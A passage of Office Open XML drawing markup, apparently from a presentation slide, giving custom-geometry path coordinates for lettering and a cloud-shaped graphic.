                    <a:pt x="175220" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175220" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165882" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163800" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156709" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152523" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="223216" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187087" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184507" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185189" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208967" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209178" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226854" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232157" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236994" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245731" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250385" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221936" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216430" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208952" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206920" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206595" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256603" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256603" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256320" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256238" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206534" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206842" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206859" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208362" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213712" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217242" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252159" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251888" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248231" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243525" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237789" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231411" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232372" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223216" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="255322" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="252904" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250385" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246971" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238314" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233844" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="252159" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="225980" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229333" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233620" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234678" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234758" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234880" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256238" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256077" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254690" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254616" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254504" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252159" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="289826" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266905" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287855" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311264" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317600" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301530" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289826" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="341969" y="48503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325000" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338879" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362064" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368636" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349262" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341969" y="48503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="335424" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="316080" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301530" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317600" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325000" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341969" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335424" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="383197" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360764" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349262" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368636" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383197" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462550" y="39339"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429060" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433591" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439728" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441272" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441272" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434831" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428633" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394780" y="69920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394832" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396974" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405911" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406210" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411137" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420342" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422882" y="96031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425829" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423817" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421216" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420119" y="79897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419184" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418209" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417599" y="77439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417111" y="75671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416990" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417579" y="69250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418717" y="67929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419875" y="66629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421541" y="65613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423736" y="64942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425504" y="64373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428125" y="63885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434993" y="63032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438204" y="62707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462550" y="39339"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462812" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441150" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462812" y="62463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441150" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439443" y="78069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437472" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432369" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431716" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430767" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="62463"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="427617" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422395" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417193" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406789" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403030" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400733" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400733" y="44195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402725" y="44195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404513" y="43504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407439" y="42529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415368" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415133" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419469" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462550" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460048" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454521" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449740" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443660" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436615" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437452" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427617" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="507292" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="485387" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485387" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507292" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507292" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="551062" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529137" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529137" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551062" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5510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E2D95951-EF28-705C-C284-AAED272DF030}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4818929" y="2993075"/>
              <a:ext cx="1285240" cy="821690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1285239" h="821689">
                  <a:moveTo>
                    <a:pt x="538580" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498911" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477551" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456191" y="9111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447037" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436357" y="15186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389059" y="41002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350916" y="74412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344813" y="83524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338710" y="91117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332607" y="100229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328030" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323453" y="116934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317350" y="126046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314299" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308196" y="154900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305144" y="165530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303619" y="174642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300567" y="195902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300567" y="223238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291413" y="224756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280733" y="226275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271578" y="229312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260898" y="232350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253270" y="236905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244115" y="242980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236487" y="247536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212075" y="277908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="314355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198344" y="326504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="332579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="341691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189189" y="338653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176984" y="335616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164778" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154098" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106800" y="341691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54926" y="367507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25937" y="397880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6102" y="435846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="463181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10680" y="534556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33565" y="569485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67131" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79337" y="605932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93069" y="610488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106800" y="616562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122057" y="619600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137315" y="621118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154098" y="622637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163252" y="622637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173932" y="621118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173932" y="634786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175458" y="643898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175458" y="653009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178509" y="662121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180035" y="669714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186138" y="687938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190715" y="695531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195292" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224281" y="741090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254795" y="766906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289887" y="786649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329556" y="800316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363122" y="806391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373802" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384482" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396688" y="809428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408894" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421099" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445511" y="804872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457717" y="801835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479077" y="795760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491283" y="792723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500437" y="788167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511117" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520272" y="777537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529426" y="771462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540106" y="765388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547735" y="759313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556889" y="753239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564518" y="745646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570620" y="753239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578249" y="762351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585878" y="768425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595032" y="776018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604186" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613341" y="789686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624021" y="794242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636227" y="800316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648432" y="804872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660638" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="812465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701833" y="818540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715564" y="820058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729296" y="820058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744553" y="821577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782696" y="818540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834571" y="806391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880343" y="786649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903228" y="768425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913908" y="759313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935269" y="727422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942897" y="703124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950526" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956629" y="706161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982566" y="706161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991720" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002400" y="703124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011555" y="700087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020709" y="695531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035966" y="686419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042069" y="678826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049698" y="672752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055801" y="666677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060378" y="659084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063429" y="649972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068007" y="642379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="633267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="624155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="615044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="602895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069532" y="592264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080212" y="593783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092418" y="595302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103098" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115304" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165653" y="589227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209899" y="571003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255671" y="531519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263299" y="517852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270928" y="505703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277031" y="492035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283134" y="461662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284659" y="446476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283134" y="431290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270928" y="388768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244991" y="350802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209899" y="323467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196167" y="314355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180910" y="308281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165653" y="303725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148870" y="299169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115304" y="296132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104624" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093944" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083264" y="299169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="302206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="262722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="250573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069532" y="239943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066481" y="229312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063429" y="220201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060378" y="209570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051224" y="188309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042069" y="170086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035966" y="160974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029864" y="153381"/>
